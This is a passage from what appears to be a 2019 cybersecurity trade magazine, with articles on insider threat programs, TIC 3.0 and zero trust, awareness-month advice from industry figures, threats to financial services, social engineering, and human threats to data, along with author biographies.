chaining is a tedious, cumbersome process and requires the manual correlation of massive amounts of<br />

data, which would require a significant effort and a large team. Automated threat chaining, coupled with<br />

an accurate risk scoring capability, is an essential requirement in order to more easily minimize insider<br />

threats.<br />

If the technology can also respond to identified threats in an automated fashion, the value to the ITP is<br />

significantly increased, as an analyst can only handle a limited number of events. According to research,<br />

the typical security analyst suffers burnout within 1-3 years!<br />

A capable SIEM tool, with automated threat identification, threat chaining, and remediation capabilities is<br />

essential for a successful ITP.<br />

Conclusion<br />

Insider threats are increasingly relevant for organizations today as attacks grow more sophisticated.<br />

Establishing an insider threat program (ITP) is an important step towards building an insider threatresistant<br />

organization.<br />

The key is to start small and grow the program footprint over time. Organizations should start with an<br />

assessment of what exactly they want to protect and identify the types of risks they want to mitigate<br />

before embarking on the implementation of the program itself. Then select the technology that flows best<br />

around the risk-tolerance and data priorities for your organization, with the ideal technology minimizing<br />

the manual work for analysts, so they can focus on dealing with identified incidents.<br />

53


About the Author<br />

Shareth Ben, Insider Threat SME at Securonix. Shareth is an information<br />

security professional with over a decade of program management experience,<br />

serving the security needs of Fortune 500 clients. Currently he is focused on<br />

providing insider threat and cyber threat solutions by bringing synergies<br />

between people, process and technology to mitigate risks to enterprises. He is<br />

passionate about improving the security posture of organizations by providing<br />

thought leadership and best practices based on lessons learned in the<br />

field. Shareth has a Master’s degree in Information Systems and a Bachelor's<br />

degree in Computer science.<br />

54


Modernize the Mission: Implementing TIC 3.0 and Zero Trust<br />

Networking<br />

By Stephen Kovac, Vice President, Global Government<br />

Head of Corporate Compliance, Zscaler, Inc.<br />

Today’s workplace functions on the expectation of mobility – work from any device at any location. While<br />

legacy data center infrastructures and strict security requirements made it difficult for Federal agencies<br />

to meet these expectations in the past, the Office of Management and Budget’s newly released Trusted<br />

Internet Connections (TIC) 3.0 policy paves a path to the modern workplace.<br />

The TIC policy’s original goal was to standardize network security across agencies by requiring all federal<br />

internet traffic to run through a TIC. It was not designed for the bandwidth-intensive requirements of a<br />

Cloud First, Mobile First government.<br />

TIC 3.0 guidance provides the necessary flexibility to secure modern cloud environments and mitigate<br />

evolving cyber threats. TIC 3.0 moves beyond a “one-TIC-fits-all” approach to allow agencies to create<br />

alternative TIC solutions that meet the spirit and intent of the original TIC guidelines. Agencies can<br />

develop new network security approaches outside of the traditional perimeter-based TICAP and MTIPS.<br />

55


In addition, the new guidance provides a catalogue of use cases for agencies to reference as they<br />

develop TIC solutions with more comprehensive security for their hybrid environment.<br />

This is a tremendous opportunity to modernize cybersecurity and improve user experiences. What<br />

should agencies consider as they develop new TIC solutions?<br />

Adopt a “TIC-in-the-Cloud”<br />

With the new policy’s outlined cloud solutions – including as-a-service models, we can expect to see<br />

agencies accelerate cloud deployments.<br />

Following the guidance of the Federal Cloud Computing Strategy, agencies will need to consider TIC<br />

cloud solutions that enhance security postures, meet mission needs, and consider intended outcomes<br />

and capabilities.<br />

Industry will come forward with many different solutions, but agencies should be wary of lift-and-shift<br />

approaches or fancy marketing solution names. An agency that simply moves a physical TIC to cloud<br />

will only move challenges in current data center environments to the cloud.<br />

Solutions should move TIC functions away from the perimeter, to a globally-balanced multi-tenant cloud<br />

security software-as-a-service model that can scale up and down on demand – a “TIC-in-the-Cloud”. By<br />

moving the TIC security stack from data centers to cloud, agencies can route federal employee traffic<br />

directly to internally and externally managed applications and internet destinations, while maintaining<br />

security and access controls.<br />

Agencies need to take advantage of the important benefits cloud service providers can offer through this<br />

‘cloud effect’. Don’t miss the opportunity to deploy a cloud solution that will improve security and user<br />

experience. With the right TIC cloud solution specified to each agency’s needs, and collaboration with<br />

these providers, agencies will be able to globally implement hundreds of patches a day with security<br />

updates and protections.<br />

Modernize Access/Security Controls with Zero Trust Networking<br />

Agencies also have the opportunity to modernize security and access controls as they develop new TIC<br />

solutions.<br />

While TIC helps to ensure the security of external connections to government networks, zero trust<br />

networking can provide more security, improved usability, and reduced costs.<br />

This connectivity approach provides granular, context-based access to applications, regardless of<br />

whether they are in agencies’ data centers or in a destination cloud, creating better user experience,<br />

while maintaining full security and visibility into the environment.<br />

56


With the massive influx of data from emerging technologies and the sensitive nature of government data,<br />

a FedRAMP-authorized zero trust solution can provide the right level of access and security controls to<br />

protect mission-critical data, while meeting TIC requirements.<br />

Customize a Solution to Drive Mission Goals<br />

TIC 3.0 identifies three new use cases beyond the traditional TIC – cloud, agency branch offices, and<br />

remote user solutions. Agencies should review and test these proven options for environments with<br />

security requirements similar to their own.<br />

Think of the TIC use case solution development as a similar process to FedRAMP’s “certify once and<br />

use many” approach. Agencies should learn from and build off each other’s pilots (successful and<br />

otherwise).<br />

While there will be many different options for TIC 3.0 solutions, the next step for each agency will be to<br />

have a clear understanding of short and long-term goals.<br />

By working with the Department of Homeland Security and General Services Administration to approve<br />

new TIC use cases, and collaborating with industry service providers, agencies can develop new TIC<br />

solutions that strengthen cybersecurity, improve user experience and productivity, and ultimately,<br />

accelerate their mission.<br />

About the Author<br />

Stephen R. Kovac, Vice President of Global Government and Head of Corporate<br />

Compliance, Zscaler. Stephen has responsibility for overall strategy,<br />

productizing, and certification of the Zscaler platform across all global<br />

governments. He also runs the global compliance efforts for all of Zscaler. His<br />

primary focus over the last years is FedRAMP, TIC/MTIP Policies, and ZTN for<br />

Federal. Under Stephen’s leadership, Zscaler became the first FedRAMP<br />

certified ZTN Platform and Secure Web Gateway. He is a 27-year veteran of the<br />

information technology and security industry with extensive experience in public<br />

sector and compliance. Prior to Zscaler, Stephen served as EVP of Strategy<br />

and Public Sector for VAZATA, a FedRAMP certified cloud provider. He also served as VP/CSO for BT<br />

Security, Vice President at Terremark Federal, a Verizon Company, and as Vice President of Verizon<br />

Public Sector. Mr. Kovac is a frequent speaker on the federal circuit, blogger, and highly quoted author<br />

on federal security and certifications. Stephen can be reached online at skovac@zscaler.com and at our<br />

company website www.zscaler.com<br />

57


<strong>Cyber</strong> Resilience: Best Practices from Leading Industry Experts<br />

this National <strong>Cyber</strong> Security Awareness Month<br />

In recent memory, the US has seen a staggering number of critical cyberattacks, and the trend does not<br />

show signs of stopping. This year alone we have seen local governments in Baltimore, Albany, Laredo,<br />

Lake City, Wilmer and the 21 other Texas towns held hostage by sophisticated ransomware attackers. A<br />

few of these attacks even proved successful, with local leaders succumbing to the pressures of ransom<br />

demands.<br />

Moreover, 60 percent of business leaders believe that the sophistication and frequency of cyber attacks<br />

will increase faster than organizations can work to prevent them. History seems to support this concern.<br />

Since 2003, the tech industry and US government have collaborated to raise awareness and offer<br />

solutions via National <strong>Cyber</strong>security Awareness each October. This October, leading industry experts<br />

have come together to provide insights on industry best practices to help organizations--and the nation-<br />

-withstand the cyberattacks<br />

58


“<strong>Cyber</strong> threats such as ransomware can be a huge threat to businesses, and even just a single employee<br />

clicking a malicious link in their emails will mean a ransom must be paid for all business data encrypted.<br />

<strong>Cyber</strong>-criminals often exploit vulnerabilities in employee emails, so it is crucial to have the right cyberdefences<br />

in place to avoid a disaster where customer data, and a lot of money, could be at risk.<br />

“Having an extensive tiered security model and instilling a strong cyber-security-aware culture across all<br />

employees will help minimise risk. But, the attack itself is only half of the problem because, without<br />

sufficient recovery tools, the resulting outage will cause loss of data and money, as well as reputational<br />

harm.<br />

“In the event of any disaster, businesses should utilise tools that allow them to roll back and recover all<br />

of their systems to a point in time just before an attack. This level of disaster recovery is paramount, as<br />

employee emails continue to exist at the core of most businesses, they remain a standing target for eversophisticated<br />

cybercriminals," said Avi Raichel, CIO, Zerto.<br />

“This National <strong>Cyber</strong> Security Awareness Month, it’s important for individuals to Own IT. Secure IT.<br />

Protect IT. in both their personal lives and at work.<br />

Only purchase online from well-known stores. Stores like Amazon, eBay, Walmart and Nordstrom spend<br />

a lot of money and resources to make sure your data is safe. Just because a store uses encryption does<br />

not mean that once they have your data that it is kept secure. Avoid smaller unknown sites that may or<br />

may not have the proper level of security for your data. Larger established companies also usually have<br />

a well-defined process for disputing purchases that may be fraud. Keep an eye on your credit card<br />

statements for unauthorized charges, even at stores you normally shop at.<br />

Use multi-factor authentication when possible. If a website or app allows for multi-factor authentication,<br />

the hassle is worth the extra level of security. This is usually in the form of a code that comes to your<br />

registered phone or email address.<br />

Keep social media content private. Unless you are a movie star, or these days a YouTube star, you<br />

should be careful about what personal data you post on social media. This is a common way that<br />

celebrities get hacked as passwords are often derived from pet’s names, favorite foods, or other personal<br />

information. Public personal data also increases your risk for identity theft.<br />

59


These are key considerations we all need to make this month--and every day--to keep our data, and in<br />

turn, our employers’ data, safe,” said Harold Sasaki, Senior Director, IT and TechOps, WhiteHat Security.<br />

“Securing Internet of Things (IoT) devices and data for business use cases is one of the hottest topics<br />

during <strong>Cyber</strong> Security Awareness Month this year. At its core, IoT represents a huge expansion of the<br />

network edge, with each deployment potentially covering wired broadband, public and private LTE, WiFi,<br />

and LoRA WAN connectivity. In the not too distant future, we’ll see IoT deployments take advantage of<br />

5G connectivity as well. The good thing is the industry and governments have started efforts to better<br />

define the inherent security controls and best practices that will help, over time, improve the overall<br />

security of IoT deployments. But that will take some time to gain mass adoption in the market.<br />

IoT devices and routers are a major source of attacks for cybercriminals and nation state<br />

attackers. According to Symantec, in 2018, 75% of botnets were router focused. IoT security can be<br />

daunting for many businesses, and there are a number of important areas that everyone who has<br />

deployed or is considering deploying IoT applications should consider. Devices typically do not have<br />

layered security features or secure software development and patching models integrated with their<br />

solutions. On top of that, many IoT devices cannot be accessed, managed, or monitored like<br />

conventional IT devices. Depending on the use case and vendor, there can be numerous OS,<br />

management and API-level interfaces and capabilities to manage.<br />

With the expanding diversity of business IoT use cases along with their associated IoT devices,<br />

architectures, vendors, management platforms and disparate security capabilities, customers should look<br />

to invest in enterprise IoT platforms to simplify the number of tools, devices and architectures needed to<br />

meet the business benefits for IoT use cases in the enterprise while reducing cyber risk.<br />

Using existing network-based security solutions may not be sufficient. Instead, organizations should look<br />

at using expert cloud-based management platforms and software-defined perimeter technologies, which<br />

effectively address the security risks inherent in IoT deployments and provide network-wide policies and<br />

visibility. IoT security will remain one of the most important enterprise security issues for many years to<br />

come. But while businesses should always be mindful of potential threats, by addressing these early and<br />

with the right technology, they can be confident in their IoT deployments now and into the future,” said<br />

Todd Kelly, CSO,Cradlepoint.<br />

“Recent cyberattacks on major companies like Sprint, Capital One and Experian continue to show how<br />

the threat landscape is complex and sophisticated. In fact, the US Signal <strong>2019</strong> State of Web and DDoS<br />

Attacks survey revealed that 83 percent of organizations have experienced a cyberattack within the last<br />

two years and 30 percent said that it caused around 20 hours of downtime.<br />

60


On the 16th anniversary of National <strong>Cyber</strong> Security Awareness Month, it’s important to think about how<br />

your organization can work to prevent and mitigate cyberattacks. Many organizations are turning to<br />

managed service providers to help implement, monitor and maintain a mixture of cybersecurity<br />

technologies, including cloud-based firewalls, DDoS protection and email security. In addition, 97 percent<br />

of participating organizations scan and test for vulnerabilities within their web applications.<br />

The recent number of organizations that are experiencing cyberattacks is jarring. The survey brings to<br />

light that there is always room for improvement in keeping up with modern cyberthreats. National <strong>Cyber</strong><br />

Security Awareness Month is a great opportunity to remind companies of the need for more robust<br />

security tools and managed services to help resource-strapped technical teams year round,” said Trevor<br />

Bidle, vice president of Information Security and Compliance Officer at US Signal.<br />

“Ransomware has become an increasingly concerning issue for individuals and businesses alike,<br />

especially in the last few years. And, as the volume of data increases, so will the frequency and intensity<br />

of attacks. In fact, ransomware attacks increased by 118 percent across all industries in the first quarter<br />

of <strong>2019</strong>, according to a recent McAfee report. These kinds of brazen, disruptive attacks on IT<br />

infrastructure shows why events, such as the upcoming National <strong>Cyber</strong>security Awareness Month, are<br />

vital to promote better protecting mission-critical data against ransomware.<br />

There are simple steps and actions you can take to protect your business, personal information and<br />

assets from attacks. For example, implement a data protection, disaster recovery and business continuity<br />

strategy, utilizing a fully integrated anti-ransomware defense powered by machine learning models,<br />

proactively detecting and preventing ransomware attacks before they occur. It is also important to invest<br />

in IT infrastructure that delivers enhanced data protection, with archiving and threat mitigation to provide<br />

a robust disaster recovery plan. While National <strong>Cyber</strong>security Awareness Month is only a month-long,<br />

cybersecurity vigilance and strategies such as these should be implemented all year-round,” said Alan<br />

Conboy, Office of the CTO, Scale Computing.<br />

“Almost all of the huge breaches we read about in the news involve attackers leveraging stolen user<br />

credentials to gain access to sensitive corporate data. This presents a significant problem for security<br />

teams. After all, an attacker with valid credentials looks just like a regular user. Identifying changes in<br />

the behaviour of these credentials is the key to successfully uncovering an attack. But in an age of alert<br />

overload, security teams are often overwhelmed and can struggle to make sense of the data in front of<br />

them.<br />

Applying User and Entity Behaviour Analytics (UEBA) to the data already collected within most<br />

organisations can help security teams connect the dots and provide a useful profile of network user<br />

61


activity. By connecting the dots and creating a map of a user’s activities, even when the identity<br />

components are not explicitly linked, security teams can create baselines of normal behaviour for every<br />

user on the network. This makes it easier to identify when a user’s activity requires further<br />

investigation. It may not stop you being breached, but it will tell you about it before the damage is done.”<br />

said Steve Gailey, Head of Solutions Architecture,Exabeam.<br />

"The simplest thing SMBs can do to protect themselves from cyber-threats is to enable multifactor<br />

authentication. Essentially, that means having more than just a password. Most people use it all the time<br />

and never even think about it. For instance, when logging into your bank account from something other<br />

than your primary computer, and the bank sends a text message to your phone with a code. You enter<br />

the code and you’re in. That’s all multifactor authentication is. In cybersecurity, we call it “something you<br />

have and something you know.<br />

While there are all kinds of complex products and technologies companies use to protect themselves –<br />

many of them excellent – the fact is, most ransomware attacks can be prevented by this easy-to-deploy<br />

process. Yet, multifactor authentication has only recently become widely adopted, despite having been<br />

around close to 20 years." said John Ford, CISO at ConnectWise.<br />

“The perils of the internet continue to increase year after year, with cyberattacks becoming more frequent<br />

and more sophisticated. Large organizations, and even the federal government, have recently felt the<br />

sting of numerous attacks - illustrating the evolving and increasingly complex landscape we are living in.<br />

<strong>Cyber</strong>security Awareness Month is a great opportunity to raise awareness around the importance of<br />

taking cybersecurity measures to protect your business.<br />

From a hosting perspective, it is important to ensure that you identify the correct service or services for<br />

your security needs. It could be a web application firewall, which mitigates complex attacks on an<br />

application level, a managed cybersecurity solution, which offers a team of cyber security experts at your<br />

finger-tips, or a DDoS IP protection, which is a hardware-based service that uses scrubbing centers<br />

worldwide to recognize incoming DDoS attacks and reroute malicious traffic. And, the right partner will<br />

tailor the best solution(s) to combat the threats your organization is most likely to face.<br />

While cybersecurity awareness month is only a month long, it is important to remember that cybersecurity<br />

awareness is an everyday job,” said Lex Boost, CEO, Leaseweb USA.<br />

62


The significance of cyberattacks cannot be overstated, nor can their potential detrimental impacts on the<br />

ability of a business to survive and thrive in this new climate. However, the best practices from leading<br />

experts above can provide guidance to companies who wish to increase their cyber resilience.<br />

About the Author<br />

Trevor Bidle, vice president of Information Security and Compliance<br />

Officer, US Signal.As VP of technical strategy at US Signal in Grand<br />

Rapids, Trevor Bidle directs the strategic and tactical goals for the<br />

company, providing foresight into product offerings. Bidle has 18 years<br />

of telecommunications experience and has held technical and<br />

management positions with SBC Communications, including<br />

responsibility for outside plant engineering, Choice One<br />

Communications and US Xchange, where he was responsible for<br />

escalations and network engineering.<br />

Lex Boost, CEO, Leaseweb USA.Lex Boost, Chief Executive<br />

Officer (CEO) of Leaseweb USA. He is responsible for the<br />

development and execution of Leaseweb’s core vision and<br />

strategy across the United States. With over 20 years’ experience<br />

in the digital industry, he has gained leadership experience from a<br />

broad range of organizations and cultures, including both B2B and<br />

B2C markets, in startups, as well as large corporations.<br />

63


Avi Raichel joined Zerto as CIO in 2017. Avi leads the company’s IT team<br />

tasked with ensuring that internal processes & systems continue to thrive<br />

alongside Zerto’s strong business growth. Before joining Zerto, Raichel spent<br />

17 years at Amdocs where he rose from MIS team leader to vice president of<br />

information systems. He led a group of 350 IT professionals and brings<br />

expertise and a proven track record of initiating, planning and executing large<br />

scale technology led transformations that meet measurable business goals.<br />

Avi holds a B.S in Economics & Accounting from the Tel-Aviv University, and<br />

a CPA certificate from the State of Israel.<br />

Todd Kelly, CSO, Cradlepoint.Todd Kelly is the Chief Security Officer<br />

at Cradlepoint, where he works with customers, executive<br />

management, and cross-functional teams to optimize customer<br />

success. Todd is an experienced go-to market leader whose<br />

experience spans from startups through IPO and Fortune 500<br />

companies.<br />

Alan Conboy, Office of the CTO, Scale Computing.Alan Conboy is part<br />

of the office of the CTO at Scale Computing since 2009. With more than<br />

20 years of experience, Conboy is an industry veteran and technology<br />

evangelist specializing in designing, prototyping, selling and<br />

implementing disruptive storage and virtualization technologies. Prior to<br />

Scale Computing, Conboy held positions at Lefthand Networks, ADIC,<br />

CreekPath Systems and Spectra Logic. Conboy is notably one of the<br />

first movers in the X86/X64 hyperconvergence space, and one of the<br />

first 30 people ever certified by SNIA.<br />

64


John Ford, Chief Information Security Officer, ConnectWise.John Ford<br />

is chief information security officer for ConnectWise. His responsibilities<br />

include ensuring security education, products and services enable<br />

ConnectWise partners to own and deliver secure solutions to their<br />

customers. John, who has more than 22 years of security and<br />

technology experience, joined the ConnectWise team in 2018. Prior to<br />

that, he served for six years as founder and CEO of Sienna Group, a<br />

leading data-centric managed security services provider that was<br />

acquired by ConnectWise. John also has held CISO and CCO roles at<br />

several large healthcare, technology and government organizations,<br />

including MCS and WellCare Health Plans. He is a board member of<br />

the Tampa Bay Cloud Security Alliance Chapter. John, who earned a bachelor’s degree in information<br />

systems from the University of South Florida, lives in Tampa Bay and plays golf whenever he has time<br />

to get on the links.<br />

Stephen Gailey, Exabeam.Stephen Gailey currently serves as the<br />

head of solutions architecture at Exabeam. Stephen Gailey is an<br />

experienced Information Security Manager used to working in highly<br />

regulated environments, dealing with compliance and legislative<br />

challenges from multiple jurisdictions. Much of Stephen’s career has<br />

been spent in financial services; primarily investment banking but also<br />

in retail banking, telecoms, utilities and insurance business<br />

environments. Stephen joined Exabeam from Splunk, where he ran<br />

the Financial Services practice and the EMEA Security Practice.<br />

Harold Sasaki, WhiteHat Security.Harold Sasaki is currently senior<br />

director of IT and TechOps at WhiteHat Security. Harold has several years<br />

of experience with start-ups, public companies and mergers and<br />

acquisitions.<br />

65


Are Financial Services the Golden Goose for <strong>Cyber</strong>criminals?<br />

By Yair Green, CTO, GlobalDots<br />

The financial services industry has been a long time favourite target for cybercriminals. They are always<br />

looking to steal information related to payment cards, online accounts and ATM machines. The<br />

cybersecurity landscape is constantly shifting and changing and the threatscape is no different - threats<br />

such as ransomware or cryptomining are continuously evolving and other, new forms of malware are<br />

constantly presenting themselves. As the financial services sector joins other industries in a journey of<br />

digital transformation, they face the challenges of blending new technologies with legacy systems, whilst<br />

also having to meet ever-changing compliance standards.<br />

This digital transformation is seeing the financial services industry increasingly turning to online portals,<br />

social media and mobile apps in order to satisfy an ever more demanding customer base - people now<br />

expect everything to be done here and now with a minimum of fuss. Paradoxically, these new digital<br />

platforms, along with a more competitive landscape where we are seeing lower costs and a lower barrier<br />

to entry, are making it even easier for cybercriminals to exploit customers. Indeed, with more and more<br />

people turning to online banking and using 3rd party apps, cybercriminals are now able to target an even<br />

larger pool of victims.<br />

66


Open Banking is a great illustration of all of this. Essentially Open Banking is a series of reforms that deal<br />

with how banks deal with consumer financial information. What it will effectively do is break the monopoly<br />

that banks once had over their customer’s account information. By doing so it will allow a new ‘generation’<br />

of 3rd party businesses to compete with financial services organisations to be able to access customer<br />

data. All well and good you might think but there are new security challenges to face with these new<br />

organisations suddenly being able to access all of this consumer financial data. Where you now have<br />

sensitive data passing via an open interface, it becomes extremely vulnerable to cyberattack. We have<br />

already seen here in the UK, customers banking with the likes of Barclays, HSBC and Lloyds Bank to<br />

name but a few, being targeted by criminals via the malicious use of banking trojans. Such activity targets<br />

customers by spamming them with emails containing a type of virus essentially - clicking on a link within<br />

the email effectively allows the hackers in and then they are free to do what they want.<br />

So what do the statistics on financial services cybercrime tell us? Well for example, a very recent report<br />

by ZeroFOX suggested a 56% year-over-year increase in digital threats targeting the financial space. As<br />

part of the report, researchers scanned 2.9 billion pieces of content and found more than 8.9 million<br />

security events in a 12-month period. Interestingly, the report showed that Financial services firms are<br />

more prone to corporate social media account takeover. Unsurprisingly, fraud made up 40% of all<br />

cyberattack activity against financial services including money-flipping schemes, customer giveaway<br />

scams and scams related to cryptocurrency; fake mobile apps also made an appearance.<br />

Another report by Fortinet, illustrates the impact that cyber threats have had on several industries,<br />

including financial services. It highlighted the massive growth in one particular threat, Coinhive which<br />

focuses on Monero cryptocurrency - cyber criminals were able to install JavaScript files onto<br />

compromised websites and make illicit gains. And even though the cybercriminals were eventually<br />

thwarted by the dismantling of Coinhive, those behind the attacks will be developing new ways of<br />

launching successful attacks.<br />

And let us not forget that financial services firms are also under the regulatory microscope; here in the<br />

UK, the FCA is able to levy fines on those organisations that are found to be wanting if their customers<br />

suffer due to a cyber attack. There are practices that organisations can put into action, especially those<br />

that promote governance and put cyber risk on the board agenda. How many big fines need to be paid<br />

before the C-suite understand the importance of proper investment in solutions and training that can help<br />

to defend from attack? Organisations need to be identifying and protecting information assets, they need<br />

to be alert for emerging threats and they need to be ready to respond. Also, keep testing and refining<br />

defences - cybercrime techniques advance at a rapid pace.<br />

Ultimately, there is no silver bullet to defend against all of these growing and ever-more sophisticated<br />

attacks. The potential rewards for cybercriminals targeting financial institutions can be potentially<br />

staggering and so those organisations in this industry must rely on threat intelligence in order to identify<br />

67


threats and understand the impact that a cyberattack could have on network security and customer<br />

confidence. Such threat intelligence highlights those threats that are perhaps no longer active but where<br />

there is still a cycle of risk development; just like a medusa, when one threat is vanquished another<br />

quickly fills the void.<br />

About the Author<br />

Yair Green is the CTO of GlobalDots, and a Cloud, Security and Web<br />

Performance Evangelist.<br />

www.globaldots.com<br />

68


The Social Engineering Methods and Countermeasures<br />

By Milica D. Djekic<br />

During the time, the people would always try to get what some individuals being the part of some group<br />

would assume as so confidential to them. Such a group of the persons could be some organization,<br />

enterprise or any business coping with so vitally important data. From today’s perspective, we would not<br />

talk about the social engineering as a common activity to obtain some valuable information from the<br />

public and private sector, but rather mention how it works if you want to make a touch and take advantage<br />

over the details belonging to some threat’s asset. Nowadays the people would get fed up from so<br />

annoying phone calls, correspondences and in person approaches that would give you the chance to<br />

skillfully gather some intelligence and assure the access to some institution mainly in a cyber fashion.<br />

Let’s try to change our perspective and imagine that we are not the victims of the carefully planned social<br />

engineering attacks, but rather someone who would go for hunting for so significant information.<br />

Maybe these sorts of tactics would get so well-known in the state-sponsored attacks, but let’s try to<br />

imagine how it would function if we would apply the similar approach to so threatening transnational crime<br />

and terrorist groups. The good question here would how those bad guys would react on so innocent<br />

phone calls or so naive e-mail communications. Knowing the psychology of the criminals – we could<br />

guess that those folks could get somehow embarrassed with such an approach, but let’s say if we talk<br />

about the cybercrime gangs – they would probably take such a challenge. In addition, it’s quite interesting<br />

to suggest that the huge advantage of the modern security sector is a technology that would give us an<br />

69


opportunity to smoothly investigate what it is happening somewhere. In other words, let’s make our story<br />

a bit reverse and let’s attempt to take the hunter’s role and chase our threat in so proactive way.<br />

What is the social engineering?<br />

The first word we would get in mind when we say the social engineering is the skill to obtain some<br />

sensitive information relying on communications, empathy and interpersonal abilities. The good trick with<br />

such a skill is that the victim would not get at that moment that he was under the attack and so many<br />

social engineers would use the vulnerabilities of the ordinary people who would always try to deal in so<br />

nice, supportive and friendly manner in order to help someone getting satisfied with their service and<br />

positive attitude. In so many cases, the people being that helpful could feel the personal joy for assisting<br />

to someone to get his problem being resolved. So, if you resolve someone’s concern you would<br />

undoubtedly demonstrate your skill and effectiveness and you would possibly get pleased how greatly<br />

you are professional and deeply inside you would believe that the other people would see you as the<br />

quite bright person. From our point of view, such ego bait could be the ultimate engine to many people<br />

to get so helpful and supportive for a reason they would leave the good impression to their surroundings.<br />

So, your personal weaknesses would make you talk in front of predatory dangerous attackers and the<br />

good point here is if we could notice those vulnerabilities with the bad guys who would also be so sensitive<br />

to their egocentric needs. Indeed, the social engineering could be the quite useful deception technique<br />

and tactic, so if we confirm that the malicious actors could also get targeted with such a strategy – we<br />

could talk about the quite new game between the cat and the mouse. Well, the good hackers are<br />

commonly the brilliant social engineers and once they make someone shares something getting so<br />

confidential – they would try to gain the access to his IT system or the entire organization. The experience<br />

would indicate that so many bad guys’ groups would deal as an enterprise and so frequently they would<br />

get registered as some firm or company that would cope with the websites, social media channels and<br />

the other ways of the communications. On the other hand, it would appear that the era of the smart guys<br />

sitting in some dark room and literally spending all their time in front of the screen got behind us and the<br />

cyber criminals of today could get active anywhere and anytime. Apparently, the cybercrime syndicates<br />

could believe they could get less visible to the authorities if they register as some business that would<br />

not surprisingly pay the tax to the state.<br />

The techniques and approaches of attack<br />

In the practice, there could be the wide spectrum of attacks to the public and private infrastructure as well<br />

as the opponent countries that should get seriously affected by those operations. As it’s pretty wellknown,<br />

the majority of e-mail addresses could get tracked online and once we confirm some e-mail<br />

location exists – we could try to prepare so skillful campaign in order to take advantage over our target.<br />

So obvious weakness in anyone’s e-mail correspondence got his signature that could include the both<br />

landline and cell phone numbers making such a detail getting traced using the emerging technological<br />

solutions. The people of today would get the habit to live in so free and open environment that would<br />

encourage them to share all they have with the rest of the community.<br />

The adequate question here could be whom we could trust. The point is if you send your e-mail to<br />

someone you do not know well enough – you should get aware that the details as your postal address,<br />

phone numbers, position in the hierarchy and social media accounts could get so annoying to you sooner<br />

or later. In other words, all these information could get used to cause the disadvantage and even the<br />

harm to you or anyone being so close to you. Everything could start as the lovely phone call that would<br />

70


equest kindly from you to give your e-mail address in order to receive some so nice promotional material<br />

and once you take such a hook – you would certainly get in trouble. Even worse – the real nightmare<br />

would appear once you begin responding to such correspondence and leaving so many details about<br />

yourself and your organization, so far.<br />

How to protect yourself from those offenses?<br />

Once you receive the phone call from someone you are not confident in – you should think twice before<br />

you make a decision to show the brilliance of your mind. The call center operator could get so nice,<br />

friendly and approachable even if he conducts some security quizzing before he makes the decision to<br />

provide the certain information on. For instance, you can always say that you must follow some security<br />

procedure and so kindly ask the caller for his contact details which could serve for sending some kind of<br />

response on his account. It can take several minutes to confirm all the claims you got from your friendly<br />

caller and once you get confident that person is not a threat to anyone – you could reply to his request.<br />

Otherwise, just ignore such a call and try to prepare the skillful report to someone being the authority in<br />

such a case.<br />

Your opponents are getting more and more innovative<br />

The fact is the social engineering is the area that would cope with a lot of innovations and even you are<br />

confident you know everything about such a field – think twice. In case you need to collect some<br />

information on the criminal group being under the investigation using such a skill – you should know that<br />

the only stuff you need in that sense is the skill by itself. If there is the certain need for the social engineers<br />

in the investigative process – you should count on the staffs who are well-trained and who got some real<br />

experience through the intelligent exercises. Does not matter how many attempts you would make – you<br />

should always know that your technique could get always improved. A series of the improvements would<br />

support you in getting more innovative and only with such a weapon in your hands – you would get<br />

capable to go a step ahead of your opponent. Do not believe that your enemies would just sit and wait<br />

for things to happen. Far from that, they would create the options to themselves and so intelligently follow<br />

the tendencies in the field.<br />

Some future perspectives<br />

The point is the social engineering is the area that should get deeply researched and once we better<br />

understand the psychological mechanisms of the people being vulnerable to those kinds of attacks – we<br />

could further proceed with our investigation. Maybe some of the ongoing suggestions in such a field could<br />

seem as so brilliant, but tomorrow they would appear as the matter of the past. The fact is you should<br />

always keep moving on if you want to stay on the surface and even if you are recognized as someone<br />

knowing a lot in such a branch – you should say to yourself that there are the heaps of people in this<br />

world who would also get so helpful ideas, so stay open to listen to so, maybe learn a bit and finally apply<br />

everything being so useful to your practical tasks.<br />

71


About The Author<br />

Milica D. Djekic is an Independent Researcher from Subotica,<br />

Republic of Serbia. She received her engineering background<br />

from the Faculty of Mechanical Engineering, University of<br />

Belgrade. She writes for some domestic and overseas presses<br />

and she is also the author of the book “The Internet of Things:<br />

Concept, Applications and Security” being published in 2017<br />

with the Lambert Academic Publishing. Milica is also a speaker<br />

with the BrightTALK expert’s channel and <strong>Cyber</strong> Security<br />

Summit Europe being held in 2016 as well as <strong>Cyber</strong>Central<br />

Summit <strong>2019</strong> being one of the most exclusive cyber defense<br />

events in Europe. She is the member of an ASIS International<br />

since 2017 and contributor to the Australian <strong>Cyber</strong> Security<br />

Magazine since 2018. Milica's research efforts are recognized<br />

with Computer Emergency Response Team for the European<br />

Union (CERT-EU). Her fields of interests are cyber defense,<br />

technology and business. Milica is a person with disability.<br />

72


How to Address the Top 5 Human Threats to Your Data<br />

By Dave Sikora<br />

The first step in developing a resilient cybersecurity posture is identifying what it is you are trying to<br />

protect. For most businesses today, that most valuable asset is data. Customer data, partner data,<br />

internal data – it’s the information you rely on to operate and grow.<br />

Whether through intentional malicious acts or simple negligence, the “insiders” with access to data are<br />

the biggest threat to security and privacy. More than 90 percent of organizations, according to a report<br />

by CA, believe they are vulnerable and nearly two-thirds also report a shift in focus toward insider-threat<br />

detection.<br />

Addressing the top 5 threats to your data is crucial in building a layered, data-centric approach to security<br />

and privacy in a world where data is currency in the bank and it seems everyone has a key to the vault.<br />

73


Guessed and stolen credentials<br />

Obtaining user passwords is one of the most common ways cyber criminals breach security defenses.<br />

Using brute force or dictionary attacks, hackers essentially “guess” user passwords based poor security<br />

hygiene and open-source intelligence.<br />

They also hoard information exposed in breaches and engage in credential stuffing, testing the<br />

combinations on unrelated sites. Many individuals use the same password on multiple platforms, and<br />

cybercriminals are also adept at manipulating credentialed users into giving away passwords through<br />

phishing and spear-phishing campaigns. Even security “strength” indicators are also weak tools for<br />

measuring password strength.<br />

For these reasons, firms turn to technology that recognizes unusual behavior around data consumption.<br />

This is a key aspect of the data governance approach, for instance, deployed by ALTR lets developers<br />

embed data security directly into applications when they are built. The idea is to prevent breaches in realtime<br />

by slowing down or blocking the flow of data when consumption exceeds set thresholds.<br />

Private data exposure<br />

Businesses today rely on their relationships with contractors, vendors, and partners to ensure every facet<br />

of their organization is optimized, yet even trustworthy partners can pose a risk. One example is thirdparty<br />

application developers. In an effort to use realistic datasets to build and maintain applications, they<br />

